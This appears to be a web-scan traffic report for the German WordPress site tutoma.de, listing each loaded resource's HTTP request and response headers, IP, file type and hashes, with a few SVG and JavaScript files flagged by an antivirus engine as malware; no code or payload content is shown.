49de71ce7f439579b17b89d41630ecc42990f5f9
6ef91d15e35c54b958239444ffa14bcd4aa4d84f10ea10a5a3af71543b74ee85
GET /ajax/libs/webfont/1.5.18/webfont.js HTTP/1.1
Host: ajax.googleapis.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://tutoma.de/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/hosted-libraries-pushers
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="hosted-libraries-pushers"
report-to: {"group":"hosted-libraries-pushers","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/hosted-libraries-pushers"}]}
timing-allow-origin: *
content-length: 6490
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Sun, 20 Nov 2022 12:31:38 GMT
expires: Mon, 20 Nov 2023 12:31:38 GMT
cache-control: public, max-age=31536000, stale-while-revalidate=2592000
age: 294637
last-modified: Tue, 03 Mar 2020 19:15:00 GMT
content-type: text/javascript; charset=UTF-8
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
tutoma.de/wp-content/uploads/2018/09/exp.png
87.98.235.184200 OK 2.9 kB URL HTTP/2 tutoma.de/wp-content/uploads/2018/09/exp.png
IP 87.98.235.184:0
File type PNG image data, 81 x 90, 8-bit/color RGBA, non-interlaced\012- data
Hash a870281b3ad0669376a9e1534e79e8c1
9fa862e73ab5282166f7c2a96a943d5b05d844a2
f32eb5e44325396bc02efdda2fc7099a21db2a342a691e42d6fd5141094b0ec7
GET /wp-content/uploads/2018/09/exp.png HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: image/png
content-length: 2851
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
last-modified: Sun, 14 Oct 2018 17:40:59 GMT
accept-ranges: bytes
cache-control: max-age=31536000
expires: Thu, 23 Nov 2023 22:22:15 GMT
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
tutoma.de/wp-content/uploads/2018/09/icon3.svg
87.98.235.184200 OK 2.6 kB URL HTTP/2 tutoma.de/wp-content/uploads/2018/09/icon3.svg
IP 87.98.235.184:0
File type SVG Scalable Vector Graphics image\012- , ASCII text, with very long lines (5112)
Hash 0abe85d5f957237ec9d62cf118a7f836
3232927359ebfdc870f18b84cf7677e8bc7e447b
c83c771bb9c1460ad468307c1049efd4758cfcbd24c80425c008ae930d79ccea
Analyzer Verdict Alert fortinet Malware
GET /wp-content/uploads/2018/09/icon3.svg HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: image/svg+xml
content-length: 2613
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
accept-ranges: none
cache-control: max-age=31536000
expires: Thu, 23 Nov 2023 22:22:15 GMT
content-encoding: gzip
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
tutoma.de/wp-content/uploads/2018/09/icon1.svg
87.98.235.184200 OK 3.5 kB URL HTTP/2 tutoma.de/wp-content/uploads/2018/09/icon1.svg
IP 87.98.235.184:0
File type SVG Scalable Vector Graphics image\012- , ASCII text, with very long lines (6340)
Hash d0ca659ecc28344aa1d0bc75a31e80e8
b5ec9c4c19dbb8d7a64ff7a357f7b950e473a8b5
ac8b984c05a32aad1069e9a53a65fd49f35a111c5db9fff5447a754dca097999
Analyzer Verdict Alert fortinet Malware
GET /wp-content/uploads/2018/09/icon1.svg HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: image/svg+xml
content-length: 3542
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
accept-ranges: none
cache-control: max-age=31536000
expires: Thu, 23 Nov 2023 22:22:15 GMT
content-encoding: gzip
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
tutoma.de/wp-content/cache/autoptimize/js/autoptimize_efedb8304766da1c83983a73091dad8b.js
87.98.235.184200 OK 56 kB URL HTTP/2 tutoma.de/wp-content/cache/autoptimize/js/autoptimize_efedb8304766da1c83983a73091dad8b.js
IP 87.98.235.184:0
File type ASCII text, with very long lines (9959)
Hash e54279170c5aa1e09b0a91ef047f42dc
ec65cba2b554bd8adefa371a23ef04bf8ae21764
a198d201ff0a6a448fa0b2f4dfb3908fbc9661fb4331a04694433b5add414b0c
Analyzer Verdict Alert fortinet Malware
GET /wp-content/cache/autoptimize/js/autoptimize_efedb8304766da1c83983a73091dad8b.js HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: application/x-javascript
content-length: 55866
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
last-modified: Mon, 11 Nov 2019 17:12:34 GMT
accept-ranges: none
cache-control: max-age=31536000, public, immutable
expires: Thu, 23 Nov 2023 22:22:15 GMT
content-encoding: gzip
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
tutoma.de/wp-content/themes/tutoma/dist/images/shape1.png
87.98.235.184200 OK 6.1 kB URL HTTP/2 tutoma.de/wp-content/themes/tutoma/dist/images/shape1.png
IP 87.98.235.184:0
File type PNG image data, 213 x 343, 8-bit/color RGBA, non-interlaced\012- data
Hash 65557582360cbfa51f0971824d046097
e747df5f4b8e12f3271423ec27b54e77e73fd8d9
102dca97c9bcee8c623d81173603191b2a56ceaace22ab08c15c59041f1b9c45
GET /wp-content/themes/tutoma/dist/images/shape1.png HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: image/png
content-length: 6092
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
last-modified: Sat, 13 Apr 2019 10:21:27 GMT
accept-ranges: bytes
cache-control: max-age=31536000
expires: Thu, 23 Nov 2023 22:22:15 GMT
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
www.googletagmanager.com/gtag/js?id=UA-128197015-1
142.250.74.168200 OK 44 kB URL HTTP/2 www.googletagmanager.com/gtag/js?id=UA-128197015-1
IP 142.250.74.168:0
File type ASCII text, with very long lines (1921)
Hash 0e7717911c7740993d76cb7278bdaff7
6e184287c96eeb637cdc0909ceb5deea00b4b796
c96de71f67c5516771b747f8c4c13254034871fb26faacaced8af6a09b9c4952
GET /gtag/js?id=UA-128197015-1 HTTP/1.1
Host: www.googletagmanager.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://tutoma.de/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-type: application/javascript; charset=UTF-8
access-control-allow-origin: *
access-control-allow-credentials: true
access-control-allow-headers: Cache-Control
content-encoding: br
vary: Accept-Encoding
date: Wed, 23 Nov 2022 22:22:15 GMT
expires: Wed, 23 Nov 2022 22:22:15 GMT
cache-control: private, max-age=900
last-modified: Wed, 23 Nov 2022 21:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains
cross-origin-resource-policy: cross-origin
server: Google Tag Manager
content-length: 43614
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
tutoma.de/wp-content/themes/tutoma/dist/images/what-could-we-do-bg.jpg
87.98.235.184200 OK 18 kB URL HTTP/2 tutoma.de/wp-content/themes/tutoma/dist/images/what-could-we-do-bg.jpg
IP 87.98.235.184:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1210x885, components 3\012- data
Hash d8d90148c413ad504b1ecebce6d5143f
5196a3829f4dd9209e86e06f1f525f49de3f5f21
e3e43f43dfee246c139b64401161f0f6b9c14e6bcdd44a682f924544b77e964b
GET /wp-content/themes/tutoma/dist/images/what-could-we-do-bg.jpg HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: image/jpeg
content-length: 17630
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
last-modified: Sat, 13 Apr 2019 10:21:28 GMT
accept-ranges: bytes
cache-control: max-age=31536000
expires: Thu, 23 Nov 2023 22:22:15 GMT
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
www.googletagmanager.com/gtm.js?id=GTM-W2LD69R
142.250.74.168200 OK 49 kB URL HTTP/2 www.googletagmanager.com/gtm.js?id=GTM-W2LD69R
IP 142.250.74.168:0
File type ASCII text, with very long lines (5763)
Hash 06d77327a3ab58c0125c4201f553f40c
19585bdc1fe36506f964b6e9ac1309f04b0c77dd
da354569083efe0782beda3345975e961007a67dd380066d1161de82c6936375
GET /gtm.js?id=GTM-W2LD69R HTTP/1.1
Host: www.googletagmanager.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://tutoma.de/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-type: application/javascript; charset=UTF-8
access-control-allow-origin: *
access-control-allow-credentials: true
access-control-allow-headers: Cache-Control
content-encoding: br
vary: Accept-Encoding
date: Wed, 23 Nov 2022 22:22:15 GMT
expires: Wed, 23 Nov 2022 22:22:15 GMT
cache-control: private, max-age=900
last-modified: Wed, 23 Nov 2022 21:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains
cross-origin-resource-policy: cross-origin
server: Google Tag Manager
content-length: 48652
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
tutoma.de/wp-content/themes/tutoma/dist/images/shape5.png
87.98.235.184200 OK 12 kB URL HTTP/2 tutoma.de/wp-content/themes/tutoma/dist/images/shape5.png
IP 87.98.235.184:0
File type PNG image data, 450 x 678, 8-bit/color RGBA, non-interlaced\012- data
Hash 32cb342c8db440275385e697f33b120b
6242a10692bbc4eeb9aa931dedc44661f866dc77
189464fb130a178d6c73dfec6c0455f55b0d1ccdda57911088e539a09c4340e8
GET /wp-content/themes/tutoma/dist/images/shape5.png HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: image/png
content-length: 12222
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
last-modified: Sat, 13 Apr 2019 10:21:27 GMT
accept-ranges: bytes
cache-control: max-age=31536000
expires: Thu, 23 Nov 2023 22:22:15 GMT
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
tutoma.de/wp-content/uploads/2019/01/seo-workshop.jpg
87.98.235.184200 OK 59 kB URL HTTP/2 tutoma.de/wp-content/uploads/2019/01/seo-workshop.jpg
IP 87.98.235.184:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 920x552, components 3\012- data
Hash d152e65ebb91943a3c4602ffa67656de
4ad36781b76af1311ee4dfff298f14cd9443acb5
3c2dbb4b9d9d5c0f7d3e789cf30bdb262cba23a6a5fd9310b75213adc671f2ef
GET /wp-content/uploads/2019/01/seo-workshop.jpg HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: image/jpeg
content-length: 58843
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
last-modified: Tue, 12 Mar 2019 16:51:45 GMT
accept-ranges: bytes
cache-control: max-age=31536000
expires: Thu, 23 Nov 2023 22:22:15 GMT
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 472 B IP 142.250.74.3:0
Hash 065495ec7a963a205abd9c8dbc75cb5d
ea416d0df4f6706150bda5da2077174f5cdd986b
1b2a2afee887651b23a849f14ace89b330329f6bf61c331545a3f6d12037aee5
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 23 Nov 2022 22:22:15 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 472 B IP 142.250.74.3:0
Hash fb4ee3082622f9f3340432290d63437e
852ca64934462e133e34043fca561aca215e6255
d4c2f665873baede94309128e276df6fdf7f0e1ec15699e75cd6bae2c24d556a
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 23 Nov 2022 22:22:15 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
tutoma.de/wp-content/plugins/contact-form-7/images/ajax-loader.gif
87.98.235.184200 OK 847 B URL HTTP/2 tutoma.de/wp-content/plugins/contact-form-7/images/ajax-loader.gif
IP 87.98.235.184:0
File type GIF image data, version 89a, 16 x 16\012- data
Hash af962b37779a443a77ab836b3b7a93f5
cad7feb11183c71b87470e11e022b16ecdcc7ac9
65b72e15d975f67fbd1cb126d57772c06c21fa016e5651b6ce213b26ce0e6877
GET /wp-content/plugins/contact-form-7/images/ajax-loader.gif HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: image/gif
content-length: 847
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
last-modified: Fri, 06 Sep 2019 17:14:39 GMT
accept-ranges: bytes
cache-control: max-age=31536000
expires: Thu, 23 Nov 2023 22:22:15 GMT
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
push.services.mozilla.com/
35.166.172.24101 Switching Protocols 0 B URL HTTP/1.1 push.services.mozilla.com/
IP 35.166.172.24:0
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET / HTTP/1.1
Host: push.services.mozilla.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: MpSuhbCViXGqwRUa5B5fEQ==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket
HTTP/1.1 101 Switching Protocols
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: LF9kFFR4/KjySzNdo1/D8OdzxXI=
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 472 B IP 142.250.74.3:0
Hash 4f22437494cab8f3b1de6d48c3677f43
42461557365b59e300ae356c37b95f652e10dacd
420bc8cc7c6624d9201c6e12fb6478f4a9cf77e90aad033b4d12687968003ccf
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 23 Nov 2022 22:22:16 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 472 B IP 142.250.74.3:0
Hash 4f22437494cab8f3b1de6d48c3677f43
42461557365b59e300ae356c37b95f652e10dacd
420bc8cc7c6624d9201c6e12fb6478f4a9cf77e90aad033b4d12687968003ccf
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 23 Nov 2022 22:22:16 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 472 B IP 142.250.74.3:0
Hash 4f22437494cab8f3b1de6d48c3677f43
42461557365b59e300ae356c37b95f652e10dacd
420bc8cc7c6624d9201c6e12fb6478f4a9cf77e90aad033b4d12687968003ccf
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 23 Nov 2022 22:22:16 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 472 B IP 142.250.74.3:0
Hash 4f22437494cab8f3b1de6d48c3677f43
42461557365b59e300ae356c37b95f652e10dacd
420bc8cc7c6624d9201c6e12fb6478f4a9cf77e90aad033b4d12687968003ccf
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 23 Nov 2022 22:22:16 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
fonts.gstatic.com/s/montserrat/v25/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2
216.58.207.195200 OK 31 kB URL HTTP/2 fonts.gstatic.com/s/montserrat/v25/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2
IP 216.58.207.195:0
File type Web Open Font Format (Version 2), TrueType, length 30928, version 1.0\012- data
Hash ac0d2859ea5f8fd6bcb3c305c08ec184
7f6c17e3e592cd8bd346b9cc261d8dd961b8aef7
ae919a7c9f25f0fd97fc18e398ae8e453fcaae487e4a4cb4f896e7fecde4a780
GET /s/montserrat/v25/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2 HTTP/1.1
Host: fonts.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://tutoma.de
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 30928
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Thu, 17 Nov 2022 16:40:18 GMT
expires: Fri, 17 Nov 2023 16:40:18 GMT
cache-control: public, max-age=31536000
age: 538918
last-modified: Mon, 11 Jul 2022 18:57:39 GMT
content-type: font/woff2
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 472 B IP 142.250.74.3:0
Hash 4f22437494cab8f3b1de6d48c3677f43
42461557365b59e300ae356c37b95f652e10dacd
420bc8cc7c6624d9201c6e12fb6478f4a9cf77e90aad033b4d12687968003ccf
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 23 Nov 2022 22:22:16 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
tutoma.de/wp-content/uploads/2018/10/favicon.png
87.98.235.184200 OK 858 B URL HTTP/2 tutoma.de/wp-content/uploads/2018/10/favicon.png
IP 87.98.235.184:0
File type PNG image data, 43 x 53, 8-bit/color RGBA, non-interlaced\012- data
Hash 0d18c22d6879b6dc11090f075043cfab
1f50ed03b08b3acca083ae4d485b9166a4956f7c
eb457b7e68372bef8190d7be135f9ccd0228782cd44329720d07b3a62e39e144
GET /wp-content/uploads/2018/10/favicon.png HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:16 GMT
content-type: image/png
content-length: 858
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
last-modified: Sun, 14 Oct 2018 17:40:45 GMT
accept-ranges: bytes
cache-control: max-age=31536000
expires: Thu, 23 Nov 2023 22:22:16 GMT
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
www.google-analytics.com/analytics.js
142.250.74.174200 OK 20 kB URL HTTP/2 www.google-analytics.com/analytics.js
IP 142.250.74.174:0
File type ASCII text, with very long lines (1325)
Hash 47e6f374ca946fddd5b59871b325736c
baa9282efc8785e84d247c3bff518eaa45f101c4
16580b5c87c58e5702e411f1888fdef511094e4cd6d62bb47d16291ffb25985e
GET /analytics.js HTTP/1.1
Host: www.google-analytics.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://tutoma.de/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
strict-transport-security: max-age=10886400; includeSubDomains; preload
x-content-type-options: nosniff
vary: Accept-Encoding
content-encoding: gzip
cross-origin-resource-policy: cross-origin
server: Golfe2
content-length: 20039
date: Wed, 23 Nov 2022 20:41:08 GMT
expires: Wed, 23 Nov 2022 22:41:08 GMT
cache-control: public, max-age=7200
age: 6068
last-modified: Tue, 27 Sep 2022 22:01:05 GMT
content-type: text/javascript
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
ocsp.digicert.com/
93.184.220.29200 OK 471 B IP 93.184.220.29:0
Hash b6e7c5faf2d24e0d958ab10ee95f6791
16b68ad4b4a2776571697dff8edc9369a3c5c451
1431771f6fd4ad8c028d53a7489acc16b829e32e01d92df5e8c923723024b75a
POST / HTTP/1.1
